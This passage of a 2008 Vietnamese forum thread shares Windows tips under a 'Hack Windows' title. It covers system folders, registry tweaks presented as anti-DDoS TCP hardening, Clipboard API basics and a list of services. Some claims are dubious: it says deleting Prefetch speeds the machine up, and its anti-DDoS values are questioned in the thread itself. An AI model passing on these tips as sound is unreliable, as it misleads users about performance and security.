-Miêu tả: Chức năng của nó là thực hiện chế độ ngủ đông cho máy. Sau khi thoát khỏi chế độ này, máy tính khôi phục lại tình trạng bộ nhớ và dữ liệu trước khi hilbernate trên đĩa.
4)RECYCLE
-Vị trí: C:\
-Miêu tả: File ẩn, chính là Trash
5)System Volume Information
-Vị trí: C:\
-Miêu tả:Thư mục ở dạng ẩn. Trong nó có chứa các dịch vụ khôi phục dữ liệu hệ thống. Chương trình khôi phục sẽ copy dữ liệu trong registry vào thư mục này. Trong thư mục này chứa các thư mục con có dạng _restore{GUID}RPxSnapshot , và đây chính là các điểm cần khôi phục của hệ thống.
6) Temp
-Vị trí: C:\Windows\temp
-Miêu tả: Thư mục chứa các file hiện thời khi một chương trình đang được cài đặt
7) Prefetch
-Vị trí: C:\Windows\Prefetch
-Miêu tả: Trong thư mục này chứa các liên kết ( links) đến các ứng dụng hay chương trình đã được thực thi. Theo thời gian thì dung lượng thư mục này sẽ lớn dần , và nếu xóa nội dung thư mục này máy của bạn sẽ chạy cực nhanh. Tuy nhiên, nếu bạn có xóa thư mục này đi, thì đừng restart máy ngay, nó sẽ làm chậm hệ thống !
8)Media
-Vị trí: C:\Windows\Media
-Miêu tả: Chứa các file .WAV cho windows
9)SoftwareDistribution
-Vị trí: C:\Windows\SoftwareDistribution
-Miêu tả: Chứa các file Automatic Update của hệ điều hành
10)i386
-Vị trí: C:\Windows\Driver\i386
-Miêu tả: Chứa cache driver.
11)WinSxS
-Vị trí: C:\Windows\WinSxS
-Miêu tả: WinSxS hay Window Side by Side, là một điểm mới của WinXP, nó chứa các phiên bản giống nhau của thư viện liên kết động và sẽ cung cấp cho các chương trình khi cần đến nó.
12)Dllcache
-Vị trí: C:\Windows\System32\Dllcache
-Miêu tả: Trong thư mục chứa các file hệ thống được bảo vệ dùng để tự động update hệ thống trong trường hợp hệ điều hành bị hư hỏng.
13)Config
-Vị trí: C:\Windows\System32\Config
-Miêu tả: Trong thư mục chứa các file làm việc với registry
14)sysoc.inf
-Vị trí:C:\Windows\Inf\Sysoc.inf
-Miêu tả:Trong quá trình cài đặt windows, win không cho phép ta chọn những chương trình cần thiết để cài đặt. Vào Add or Remove Program, Win ẩn các chương trình như game...Nếu bạn muốn remove chúng, tìm file sysoc.inf , rồi xóa tất cả các từ HIDE có trong đó. Chúng sẽ lộ diện.
[Up] [Print Copy]
  [Question]   Chống DDos bằng Regedit 05/01/2008 19:18:32 (+0700) | #14 | 108481
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
regedit

(Start--->RUN--->Regedit)


--> HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Tạo một khóa có tên Psched ( nếu nó chưa có )
---> Thêm một value DWORD có tên "MaxOutstandingSends".
---> modify value data : 65535. ( chọn base Hex)
Dưới đây là một vài khóa giúp chống DDos.

[HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS]
"SYNATTACKPROTECT"=DWORD:00000002
"TCPMAXDATARETRANSMISSIONS"=DWORD:3
"TCPMAXHALFOPEN"=DWORD:64
"TCPMAXHALFOPENRETRIED"=DWORD:50
"TCPMAXPORTSEXHAUSTED"=DWORD:1
"TCPMAXCONNECTRESPONERETRANSMISSIONS"=DWORD:2
"ENABLEDEADGWDETECT"=DWORD:0
"ENABLEPMTUDISCOVERY"=DWORD:0
"KEEPALIVETIME"=DWORD:300000
"ALLOWUNQUALIFIEDQUERY"=DWORD:0
"DISABLEDYNAMICUPDATE"=DWORD:1
 

-- HAVE FUN --
[Up] [Print Copy]
  [Question]   Chống DDos bằng Regedit 05/01/2008 22:23:09 (+0700) | #15 | 108488
Defender
Locked

Joined: 03/07/2006 11:27:43
Messages: 624
Offline
[Profile] [PM] [WWW] [Yahoo!]

Reversing... wrote:
regedit

(Start--->RUN--->Regedit)


--> HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Tạo một khóa có tên Psched ( nếu nó chưa có )
---> Thêm một value DWORD có tên "MaxOutstandingSends".
---> modify value data : 65535. ( chọn base Hex)
Dưới đây là một vài khóa giúp chống DDos.

[HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS]
"SYNATTACKPROTECT"=DWORD:00000002
"TCPMAXDATARETRANSMISSIONS"=DWORD:3
"TCPMAXHALFOPEN"=DWORD:64
"TCPMAXHALFOPENRETRIED"=DWORD:50
"TCPMAXPORTSEXHAUSTED"=DWORD:1
"TCPMAXCONNECTRESPONERETRANSMISSIONS"=DWORD:2
"ENABLEDEADGWDETECT"=DWORD:0
"ENABLEPMTUDISCOVERY"=DWORD:0
"KEEPALIVETIME"=DWORD:300000
"ALLOWUNQUALIFIEDQUERY"=DWORD:0
"DISABLEDYNAMICUPDATE"=DWORD:1
 

-- HAVE FUN -- 

Nhờ bạn cho biết tác dụng của các động tác trên chống được DDoS ở điểm nào!?
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 05/01/2008 23:02:58 (+0700) | #16 | 108495
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Để thêm chử SƯU TẦM cũng đâu có chết ai phải không bạn.
Lần đầu tiên thấy "chống Ddos bằng regedit" đó.
PS: Tui post lại lời ghóp ý của 3 năm trước, gần sát với nguyên văn.
Có post cái hướng dẫn abc nào, cũng nên có phần mở đầu của thảo luận hoặc ý kiến cá nhân thực tế trong đó. Post đều đều, thu lượm kiểu này chẳng ích lợi gì 

Cái box này có tên là "thảo luận hệ điều hành Windows" đó bạn. Nó có chử "thảo luận" trỏng.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 06/01/2008 00:52:39 (+0700) | #17 | 108524
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
Chào tmd, tớ có vài lời thế này:
Thứ nhất, đã là thủ thuật thì chỉ có thể là sưu tầm hoặc mò mẫm, có cần thiết phải nói rõ ra nguồn ở đâu không trong khi các vấn đề hết sức đa dạng và trong khi tác giả còn không nhớ chính "tác giả" là ai nữa !. Không cần lắm bởi lên Google là có tất. Vấn đề ở đây, sẽ có những điều còn mới mẻ với một số người, có người biết có người chưa biết, có thể cậu thấy các vấn đề được nêu ra dễ dàng và cũ quá thì có lẽ topic này không thích hợp với cậu, tớ viết cho những người "bắt đầu" quậy Windows ( tớ đây chẳng hạn ) thôi.
Thứ hai, về câu hỏi của anh Đì phen đơ, muốn trả lời được em đây chưa đủ trình độ để nói đầy đủ và rõ ràng về tấn công DOS, tuy nhiên cái trên là em tìm được, và chắc chắn là nó sẽ có ích trong việc phòng chống DDos, cụ thể , để khách quan, em trích dẫn bằng tiếng Anh những điều đã nói:
1)TcpMaxDataRetransmissions

Determines how many times TCP retransmits an unacknowledged data segment on an existing connection. TCP retransmits data segments until they are acknowledged or until this value expires.

TCP/IP adjusts the frequency of retransmissions over time. TCP establishes an initial retransmission interval by measuring the round trip time on the connection. The interval doubles with each successive retransmission on a connection, and it is reset to the initial value when responses resume.
 

2)SynAttackProtect

Determines whether the SYN flooding attack protection feature of TCP/IP is enabled. SYN flooding attack protection is enabled when the value of this entry is 1
 

3)TcpMaxConnectResponseRetransmissions

Determines how many times TCP retransmits an unanswered SYN-ACK (connection request acknowledgment). TCP retransmits acknowledgments until they are answered or until this value expires. This entry is designed to minimize the effect of denial-of-service attacks (also known as SYN flooding ) on the server.
 

4)TcpMaxHalfOpen

Determines how many connections the server can maintain in the half-open (SYN-RCVD) state before TCP/IP initiates SYN flooding attack protection . This entry is used only when SYN flooding attack protection is enabled on this server, that is, when the value of the SynAttackProtect entry is 1 and the value of the TcpMaxConnectResponseRetransmissions entry is at least 2.
 

5)TcpMaxPortsExhausted

Determines how many connection requests the system can refuse before TCP/IP initiates SYN flooding attack protection . The system must refuse all connection requests when its reserve of open connection ports runs out. This entry is used only when SYN flooding attack protection is enabled on this server, that is, the value of the SynAttackProtect entry is 1 and the value of the TcpMaxConnectResponseRetransmissions entry is at least 2).
 

6)TcpMaxHalfOpenRetried

Determines how many connections the server can maintain in the half-open (SYN-RCVD) state even after a connection request has been retransmitted. If the number of exceeds the value of this entry, TCP/IP initiates SYN flooding attack protection . This entry is used only when SYN flooding attack protection is enabled on this server, that is, when the value of the SynAttackProtect entry is 1 and the value of the TcpMaxConnectResponseRetransmissions entry is at least 2.
 

7)EnableDeadGWDetect

Determines whether TCP performs dead gateway detection. Dead gateway detection is a TCP feature that identifies gateways that are not operating properly and that switches the computer to a new default gateway.
 

8)AllowUnqualifiedQuery

Determines whether the Domain Name System (DNS) permits unqualified queries.

An unqualified query does not include the domain name. Any matching host name satisfies it. The query format is the host name followed by a period: hostname .

If unqualified queries are not permitted and a query is submitted without a domain name, the DNS service automatically appends the name of the local domain.
 

9)DisableDynamicUpdate
Disables the Domain Name System (DNS) dynamic update registration for all interfaces on the system.

With dynamic update, DNS client computers automatically register and update their resource records whenever address changes occur.
 
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 06/01/2008 00:59:24 (+0700) | #18 | 108529
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Vậy với lý do này, bà con nào cũng có thể spam đầy forum với lý do, cho "newbie", đi kèm với chuyện không để nguồn góc, không phân tích bất kỳ điều gì. Vậy nên post bài này xuống khu tài liệu hữu ích, nó rất phù hợp với các loại post kiểu này. Vì nó chẳng có hơi hám của "thảo luận". Vô ích thấy rõ.
Thiếu chử "sưu tầm" hoặc tương tự là vi phạm luật rồi.
PS: Càng nhiều bà con lờ đi chuyện "thảo luận" và "bản quyền", cứ mặc định là đó là của mình.
Chào các bạn.
Tớ sẽ cố gắng thực hiện một tut hoàn chỉnh về hack windows bằng các thủ thuật và lập trình.  

3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 06/01/2008 01:10:32 (+0700) | #19 | 108534
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
Cái thu được sau khi đọc một topic không nằm ở 2 chữ "SƯU TẦM", mà nằm ở nội dung. Đó là quan điểm của tớ. Xin dừng topic tại đây.
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 06/01/2008 02:15:58 (+0700) | #20 | 108546
Defender
Locked

Joined: 03/07/2006 11:27:43
Messages: 624
Offline
[Profile] [PM] [WWW] [Yahoo!]

Reversing... wrote:

Thứ nhất, đã là thủ thuật thì chỉ có thể là sưu tầm hoặc mò mẫm,...
 

Cái này sai! Bạn hoàn toàn có thể phát minh ra một thủ thuật và phổ biến chúng cho cộng đồng dùng và cái đó bạn là tác giả.

Reversing... wrote:

có cần thiết phải nói rõ ra nguồn ở đâu không trong khi các vấn đề hết sức đa dạng và trong khi tác giả còn không nhớ chính "tác giả" là ai nữa !. Không cần lắm bởi lên Google là có tất.
 

Rất cần phải ghi rõ nguồn gốc! Đấy là quy định chung của diễn đàn áp dụng cho mọi người.

Reversing... wrote:

Thứ hai, về câu hỏi của anh Đì phen đơ, muốn trả lời được em đây chưa đủ trình độ để nói đầy đủ và rõ ràng về tấn công DOS, tuy nhiên cái trên là em tìm được, và chắc chắn là nó sẽ có ích trong việc phòng chống DDos, cụ thể , để khách quan, em trích dẫn bằng tiếng Anh những điều đã nói: ...
 

- "Defender" chứ không phải "Đì phen đơ" nhé!
- Bài trên bạn nói là dùng regedit để chống DDoS sao dưới lại nói là tấn công DOS!? Tấn công DOS là tấn công kiểu gì vậy!?

Bạn hoàn toàn không hiểu những gì bạn post lên. Và cũng không ghi rõ nguồn gốc.
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 06/01/2008 06:23:17 (+0700) | #21 | 108592
chaien281985
Member

[Minus]    0    [Plus]
Joined: 17/06/2007 14:48:15
Messages: 248
Location: HVAN
Offline
[Profile] [PM] [WWW]
mình nghĩ ko nên chấp nhặt câu chữ làm gì
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 08/01/2008 09:19:44 (+0700) | #22 | 108986
duycuong100
Member

[Minus]    0    [Plus]
Joined: 18/12/2006 22:27:34
Messages: 2
Offline
[Profile] [PM]
bài viết này thay thật nhưng hơi khó hiểu____@_@
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 16/01/2008 21:33:19 (+0700) | #23 | 110555
[Avatar]
mystery_hacker
Member

[Minus]    0    [Plus]
Joined: 30/06/2006 16:16:03
Messages: 365
Location: Khánh Hòa
Offline
[Profile] [PM] [Yahoo!]
Bạn xem lại dùm mình các link download trong bài. Không cái nào download được hết!
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 16/01/2008 22:59:21 (+0700) | #24 | 110563
[Avatar]
haipt
Member

[Minus]    0    [Plus]
Joined: 20/08/2004 19:48:44
Messages: 165
Location: Hải phòng
Offline
[Profile] [PM] [WWW]
Đối với ta, thế là đủ .
Cách loại bỏ một cổng :


*Chạy regedit.exe trong cmd.
* Tìm trong registry tất cả các cổng bạn muốn loại bỏ, sau đó gán giá trị 0 hoặc 1 cho nó
*Restart Windows

 

Tìm ở chỗ nào nhỉ
smilie smilie smilie smilie
Mấy post cuối tương đối hay, đọc đến mấy bài của TMP đâm ra tụt cả hứng smilie

Rất cần phải ghi rõ nguồn gốc! Đấy là quy định chung của diễn đàn áp dụng cho mọi người. 

uhm, vậy ghi nguồn là từ internet là đc rồi...nếu không thể chi tiết hơn.
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 16/01/2008 23:19:38 (+0700) | #25 | 110564
[Avatar]
Look2Me
Member

[Minus]    0    [Plus]
Joined: 26/07/2006 23:30:57
Messages: 235
Location: Tủ quần nào
Offline
[Profile] [PM]

PhamTienSinh wrote:
Đối với ta, thế là đủ .
smilie smilie smilie smilie
Mấy post cuối tương đối hay, đọc đến mấy bài của TMP đâm ra tụt cả hứng smilie

Rất cần phải ghi rõ nguồn gốc! Đấy là quy định chung của diễn đàn áp dụng cho mọi người. 

uhm, vậy ghi nguồn là từ internet là đc rồi...nếu không thể chi tiết hơn. 

Chia sẻ quan điểm.

Mọi người đừng chấp nhặt câu chữ quá. Rõ ràng đây là 1 loạt bài viết có chủ điểm và khá hay. Và chắn chắn đây không phải là leech bài! Tiếc quá chủ topic bực mình bỏ đi rồi.
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 17/01/2008 05:48:45 (+0700) | #26 | 110623
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
@mystery_hacker: sorry vì tớ quên xem lại. Các bạn vào đây hoặc đây để down mấy link trên.
@PhamTienSinh: Xin lỗi vì không nói rõ. Ở đây có ý là bạn phải tắt giao tiếp qua cổng đó đối với chương trình nào đó. Chẳng hạn qua Firewall ta có thể tắt giao tiếp cho một chương trình nào mình muốn. Còn trong registry, muốn biết, ta phải tìm kiếm qua chức năng Find trong regedit.

Thực ra tớ rất muốn post các bài viết về lập trình APi. Hy vọng topic sẽ tiếp tục.
[Up] [Print Copy]
  [Question]   Re: .:Hack Windows:. 17/01/2008 07:08:55 (+0700) | #27 | 110642
FaL
Moderator

Joined: 14/04/2006 09:31:18
Messages: 1232
Offline
[Profile] [PM]

Reversing... wrote:

Thực ra tớ rất muốn post các bài viết về lập trình APi. Hy vọng topic sẽ tiếp tục. 


You're welcome,
Những đóng góp của bồ khá hay, tuy nhiên nên chú ý đóng góp của mọi người. Nếu cần có thể tạo topic mới và thảo luận chuyên về vấn đề đó. Tránh những post làm loãng topic.
[Up] [Print Copy]
  [Question]   Clipboard 19/01/2008 15:05:59 (+0700) | #28 | 111105
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
Bây giờ ta sẽ nói nhiều hơn về Windows bằng giao diện API. Gọi là giao diện, bởi qua đây ta có thể gián tiếp thực hiện các nhiệm vụ quan trọng của hệ điều hành: quản lý và đồng bộ tiến trình ( process), quản lý bộ nhớ (memory manament), quản lý hệ thống file . Với mỗi nhiệm vụ trong windows xây dựng một lớp các hàm API giúp người dùng trực tiếp tác động lên tài nguyên hệ thống , nhưng trong chế độ bảo vệ của chính hệ điều hành windows. Thông qua API, ta sẽ hiểu windows làm việc thế nào với các chương trình. Và bây giờ sẽ là một ví dụ: Clipboard - đây chính là một trong những cách mà windows cho phép trao đổi dữ liệu giữa các chương trình với nhau. Chẳng hạn, bạn copy một file ảnh từ Paintbrush, sau đó copy vào file doc nào đó, rồi chỉnh sửa trong Photoshop..., chính ngừoi dùng đã làm việc với Clipboard để làm các công việc này.
Cần nhớ rằng: Clipboard chỉ là một vùng nhớ nằm trong bộ nhớ.
Mỗi khi bạn click phải chuột và copy một file, có phải dữ liệu từ file đã được đưa vào Clipboard?
Câu trả lời là không. Thực sự nó chỉ đưa vào Clipboard định dạng của dữ liệu và địa chỉ vùng nhớ chứa dữ liệu đó. Sau đó khi một chương trình cần đọc dữ liệu trong Clipboard thì file mới thực sự được đưa vào Clipboard.
Các hàm API cơ bản nhất giúp làm việc với Clipboard:

1)BOOL WINAPI OpenClipboard(HWND hwnd); // truy cập đến Clipboard
2)BOOL WINAPI CloseClipboard(void); // sau khi sử dụng Clipboard, chương trình đóng Clipboard lại
3)BOOL WINAPI EmptyClipboard(void); // làm rỗng Clipboard
4)HANDLE WINAPI SetClipboardData(UINT uFormat, HANDLE hData); // thực hiện ghi vào Clipboard
5)HANDLE WINAPI GetClipboardData(UINT uFormat); // đọc từ Clipboard
 


Ta lưu ý đến hàm thứ 4. Tham số của nó là uFormat và hData.
uFormat - như đã nói ở trên , chính là định dạng dữ liệu cần đưa vào Clipboard.
Nó có thể là: CF_TEXT ( dạng mảng các ký tự ), CF_BITMAP ( mảng các bit ),...
còn hData - một số nguyên đặc trưng cho vùng nhớ cần lưu.
Dễ thấy rằng , khi ta copy file vào Clipboard, chẳng có dữ liệu nào từ file được copy cả !

Trình tự thực hiện khi copy sẽ là:

- Open Clipboard
- Empty Clipboard
- Tách một vùng nhớ ( chính là Clipboard ) có dung lượng đủ để chứa dữ liệu . ( hàm GlobalAlloc () )
- Cố định vùng nhớ đó ( dùng hàm GlobalLock() )
- Thực hiện ghi vào Clipboard
- Tháo bỏ tính "cố định" của Clipboard ( GlobalUnlock())
- Gọi hàm SetClipboardData với các tham số cần thiết
- Đongs Clipboard.
 


Các soft và tài liệu iên quan:
1) Trình dịch Dev-Cpp
2) Visual Api
3) Tutorial Api
4) Programming Windows
-
[Up] [Print Copy]
  [Question]   Registry 21/01/2008 09:37:31 (+0700) | #29 | 111327
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
5 thủ thuật nhỏ sau có thể giúp bạn giải quyết một số khó chịu khi dùng windows
1. Shutdown
Cho phép windows tự động tắt những chương trình đang chạy khi bạn shutdown. Tức ta không phải trả lời việc có tắt các ứng dụng đang chạy hay không khi shutdown computer.
HKEY_CURRENT_USER\Control Panel\Desktop. Edit the AutoEndTasks 
--> sửa thành 1 ( nếu có ), nếu không có khóa đó, bạn tạo khóa như trên.
2. Thay đổi tên user registered:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion 
, tìm khóa RegisteredOwnerRegisteredOrganization, rồi thay đổi theo ý muốn của bạn.
3. Program Time Out:
Khi một ứng dụng bị treo , window đưa ra một dialog thông báo về việc này. Thời gian "bị treo" của chương trình từ đó window đưa ra thông báo là 5 giây ( theo mặc định ). Ta có thể tăng thời gian trên bằng cách sau:
HKEY_CURRENT_USER\Control Panel\Desktop 
, Chọn HungAppTimeout và sửa giá trị theo miliseconds. ( Mặc định là 5000 ).
4. Disk Cleanup :
Window thường đưa ra thông báo về việc đĩa của bạn không đủ chỗ chứa dữ liệu . Bạn muốn không cho nó xuất hiện nữa thì làm như sau:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 
, tạo một DWORD value với tên NoLowDiskSpaceChecks, rồi cho nó giá trị 1.
5. Installing Program:
Khi bạn cài đặt một chương trình, window đưa ra đường dẫn mặc định là C:\Program Files. Bạn muốn thay đổi đường dẫn này thì làm như sau:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion 
. Tìm đến value với tên ProgramFilesDir. Thay đổi với đường dẫn đến thư mục bạn muốn cài.
6. .reg
Nếu bạn muốn chỉnh sửa các khóa trong registry, tốt nhất hãy sửa nó bằng notepad. Để làm việc này, bạn làm như sau:

1. Thực hiện backup dữ liệu trước khi chỉnh sửa trong registry bằng cách:
Start -> Control Panel -> Performance and Maintenance -> System Restore rồi thực hiện các bước theo wizard.
2. Bạn vào regedit. Giả sử ta đang ở nhánh HKEY_CURRENT_USER\Control Panel\Accessibility , bạn vào Menu File->Export. Lúc này, bạn đã tạo một file .reg. Nội dung của nó lúc này là:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility]
[HKEY_CURRENT_USER\Control Panel\Accessibility\Blind Access]
"On"="0"
[HKEY_CURRENT_USER\Control Panel\Accessibility\HighContrast]
"Flags"="126"
"High Contrast Scheme"="High Contrast Black (large)"
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Preference]
"On"="0"
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"AutoRepeatDelay"="1000"
"AutoRepeatRate"="500"
"BounceTime"="0"
"DelayBeforeAcceptance"="1000"
"Flags"="126"
[HKEY_CURRENT_USER\Control Panel\Accessibility\MouseKeys]
"Flags"="62"
"MaximumSpeed"="80"
"TimeToMaximumSpeed"="3000"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SerialKeys]
[HKEY_CURRENT_USER\Control Panel\Accessibility\ShowSounds]
"On"="0"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="2"
"FSTextEffect"="0"
"WindowsEffect"="1"
[HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys]
"Flags"="510"
[HKEY_CURRENT_USER\Control Panel\Accessibility\TimeOut]
"Flags"="2"
"TimeToWait"="300000"
[HKEY_CURRENT_USER\Control Panel\Accessibility\ToggleKeys]
"Flags"="62"
 

Chỉ việc chỉnh sửa các khóa ở đây rồi save là đủ.
3. Bây giờ , khi bạn double-click lên file .reg. Window sẽ mặc định gọi là regedit.exe để ta chỉnh sửa nó. Để mặc định là notepad, bạn làm như sau:
Tools->Folder Options->File Types-> Chọn REG -> Advanced-> Chọn Edit->Set Default-> OK
Nếu muốn dùng một chương trình khác để sửa registry, bạn chọn đường dẫn ở mục Edit ở trên , rồi cho đường dẫn như sau ( ví dụ ):C:\Program Files\TextPad 4\TextPad.exe %1

R

Chi tiết tham khảo tại đây
[Up] [Print Copy]
  [Question]   Tìm hiểu services trong Windows 21/01/2008 11:27:51 (+0700) | #30 | 111342
Reversing...
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 06:28:04
Messages: 117
Location: -1.-1.-1.-1
Offline
[Profile] [PM] [Yahoo!]
Bạn muốn xem chi tiết về các service trong máy bạn? Hay là process?
Với các công cụ như cmd thì là không thể. Tuy nhiên , trong windows hỗ trợ một công cụ cho các administrator : Windows Script Host ( xin mời các bạn vào trang web của microsoft để tìm hiểu kỹ hơn ). Có thể lấy một ví dụ :
Run->wmic ->Enter 

Tại con trỏ lệnh, gõ process. Ban sẽ thấy chi tiết tất cả các process trong máy bạn.
Về WMI có dịp ta sẽ bàn đến nó. Còn bây giờ, nếu bạn có thắc mắc về một service nào đang chạy , có thể xem list ở phía dưới
Format: Tên 1 ----------- Tên 2 -------------- Tên 3
với Tên 1: Tên của service khi vào Control Panel -> Administrator - > Services
Tên 2: Tên trong registry
Tên 3: Tên trong Taskmgr.
Về chức năng của mỗi service, các bạn hãy vào trang web của Microsoft để tìm kiếm.
----------------------------------------------------------------------------------------------------------------------------
1.Automatic Updates --------------- wuauserv --------------svchost.exe
2. WMI Performance Adapter)------- WmiApSrv -----------wmiapsrv.exe
3. Wireless Zero Configuration------- WZCSVC -------------svchost.exe
4. Internet Connection Firewall/Internet Connection Sharing)----- SharedAccess -----------svchost.exe
5. ICS----------------- SharedAccess ----------------svchost.exe
6. WebClient) --------------------WebClient ---------------svchost.exe
7. Secondary Logon---------------- seclogon ----------------------------svchost.exe
8. Remote Access Auto Connection Manager------------ RasAuto -------------svchost.exe
9. Logical Disk Manager------- dmserver ----------------svchost.exe
10. (Upload Manager)--------------- uploadmgr -----------------svchost.exe
11. Print Spooler---------------- Spooler ----------------spoolsv.exe
12. Remote Access Connection Manager---------- RasMan --------------svchost.exe
13. Remote Desktop Help Session Manager------- RDSessMgr -------------sessmgr.exe
14. Network DDE DSDM--------------- NetDDE dsdm -------------netdde.exe
15. Security Accounts Manager----------- SamSs ------------lsass.exe
16. Human Device Access Interface---------- HidServ ------------svchost.exe
17. Event Logs --------- Eventlog ------------services.exe
18. Performance Logs and Alerts--------------SysmonLog -------------smlogsvc.exe
19. Protected Storage -------------- ProtectedStorage -------------lsass.exe
20. Windows Management Instrumentation------------ Winmgmt ------------svchost.exe
21. Uninterruptible Power Supply----------- UPS ------------ups.exe
22. Distributed Link Tracking Client----------- TrkWks -------------svchost.exe
23. Distributed Transaction Coordinator---------- MSDTC --------------msdtc.exe
24. Remote Procedure Call Locator(RPC) ------- RpcLocator ---------locator.exe
25. Routing and Remote Access------------ RemoteAccess ------------svchost.exe
26. Smart Card Helper--------------SCardDrv ---------------SCardSvr.exe
27. TCP/IP NetBIOS Helper Service--------- LmHosts ---------------svchost.exe
28. Computer Browser ------------- Browser ---------------svchost.exe
29. Shell Hardware Detection---------- ShellHWDetection -------------svchost.exe
30. Task Scheduler------------- Schedule --------------------svchost.exe
31. NT LM Security Support Provider------------- NtLmSsp --------------lsass.exe
32. Workstation----------- lanmanworkstation ------------svchost.exe
33. Windows Management Instrumentation Driver Extension------- Wmi-------- svchost.exe
34. Net Logon----------- Netlogon --------------lsass.exe
35. Network Connections---------------- Netman ---------------svchost.exe
36. Server---------------lanmanserver ------------svchost.exe.exe
37. ClipBook----------- ClipSrv -----------clipsrv.exe
38. Portable Media Serial Number---------- WmdmPmSp -------------svchost.exe
39. COM+ Event System------------ EventSystem ------------svchost.exe
40. COM+ System Application-------------COMSysApp ----------dllhost.exe
41. Logical Disk Manager Administrative Service---------- dmadmin ------------dmadmin.exe
42. System Restore Service-------- srservice----------- svchost.exe
43. Windows Time----------- W32Time -------------svchost.exe
44. Windows Image Acquisition (WIA)------------ stisvc ------------svchost.exe
45. Indexing Service------------ cisvc -------------cisvc.exe
46. SSDP Discovery Service----------- SSDPSRV ---------svchost.exe
47. Error Service Reporting -------ERSvc ----------------svchost.exe
48.Multimedia-------------- WmdmPmSp ------------svchost.exe
49. Network Location Awareness (NLA)-------------- Nla ------------svchost.exe
50. Network DDE----------- NetDDE --------------netdde.exe
51. Messenger--------------- Messenger ------------services.exe
52. Fax Service------------FAX -----------fxssvc.exe
53. Application Layer Gateway Service----------- -ALG -------alg.exe
54. IMAPI CD-Burning COM Service---------- ImapiService ------------imapi.exe
55. Cryptographic Services--------------- CryptSvc -------------svchost.exe
56. Terminal Services----------------- TermService ---------------svchost.exe
57. IPSEC Services----------------PolicyAgent --------------lsass.exe
58. Fast User Switching Compatibility----------- FastUserSwitching Compatibility--- svchost.exe
59. Help and Support----------- helpsvc----------- svchost.exe
60. Removable Storage------------NtmsSvc ------------svchost.exe
61. Telephony--------------- TapiSrv------------------- svchost.exe
62. Themes-------------- Themes-------------- svchost.exe
63. Volume Shadow Copy---- VSS -------------vssvc.exe
64. System Event Notification-------------- SENS -----------svchost.exe
65. Remote Procedure Call (RPC)---------- RpcSs----------- svchost.exe
66. Remote Registry Service-------------- RemoteRegistry ----------svchost.exe
67. Universal Plug and Play Device Host---------------UPNPhost -----------svchost.exe
68. Application Management--------------- AppMgmt -------------svchost.exe
69. Background Intelligent Transfer Service----------- BITS -----------svchost.exe
70. Security Center-------------- wscsvc ------------------svchost.exe
71. DHCP Client-------------- Dhcp ---------------svchost.exe
72. DNS Client------------- Dnscache -----------svchost.exe
73. NetMeeting Remote Desktop Sharing------------- mnmsrvc---------- mnmsrvc.exe
74. Plug and Play-------------- PlugPlay ---------------services.exe
75. QoS RSVP-------------- RSVP -----------------rsvp.exe
76. Telnet-------------- TlntSvr ------------------tlntsvr.exe
77. Windows Audio---------------- AudioSrv ---------------svchost.exe
78. Windows Installer--------------MSIServer ------------msiexec.exe
79. World Wide Web Publishing--------------W3SVC ------------inetinfo.exe
80. Simple TCP/IP Services-------------- SimpTcp -------------tcpsvcs.exe
81. TCP/IP Printer Server--------------- LPDSVC ----------tcpsvcs.exe
82. SNMP Trap Service-------------- SMNPTRAP-----------snmptrap.exe
